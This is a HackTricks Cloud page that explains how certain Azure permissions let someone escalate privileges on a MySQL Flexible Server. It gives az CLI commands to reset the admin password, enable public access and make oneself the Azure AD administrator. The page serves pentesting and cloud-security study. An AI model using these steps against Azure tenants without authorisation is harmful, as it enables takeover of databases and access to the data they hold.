HackTricks CloudAz - MySQL Database Privesc
Reading time: 3 minutes
{% hint style="success" %}
Learn & practice AWS Hacking: (1) (1) (1).png)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  (1).png)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
MySQL Database Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-mysql.md" %} az-mysql.md {% endcontent-ref %}
""Microsoft.DBforMySQL/flexibleServers/read" && "Microsoft.DBforMySQL/flexibleServers/write"
With this permission, you can create, update, or delete MySQL Flexible Server instances on Azure. This includes provisioning new servers, modifying existing server configurations, or decommissioning servers.
{% code overflow="wrap" %}
az mysql flexible-server create \
--name <ServerName> \
--resource-group <ResourceGroupName> \
--location <Location> \
--admin-user <AdminUsername> \
--admin-password <AdminPassword> \
--sku-name <SkuName> \
--storage-size <StorageSizeInGB> \
--tier <PricingTier> \
--version <MySQLVersion>
{% endcode %}
For example, this permissions allow changing the MySQL password, usefull of course in case that MySQL authentication is enabled.
{% code overflow="wrap" %}
az mysql flexible-server update \
--resource-group <resource_group_name> \
--name <server_name> \
--admin-password <password_to_update>
{% endcode %}
Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
{% code overflow="wrap" %}
az mysql flexible-server update --resource-group <resource_group_name> --server-name <server_name> --public-access Enabled
{% endcode %}
""Microsoft.DBforMySQL/flexibleServers/read", "Microsoft.DBforMySQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforMySQL/flexibleServers/administrators/write" && "Microsoft.DBforMySQL/flexibleServers/administrators/read""
With this permission, you can configure Azure Active Directory (AD) administrators for a MySQL Flexible Server. This can be exploited by setting oneself or another account as the AD administrator, granting full administrative control over the MySQL server. It's important that the flexible-server has a user assigned managed identities to use.
{% code overflow="wrap" %}
az mysql flexible-server ad-admin create \
--resource-group <ResourceGroupName> \
--server-name <ServerName> \
--display-name <ADAdminDisplayName> \
--identity <IdentityNameOrID> \
--object-id <ObjectID>
{% endcode %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.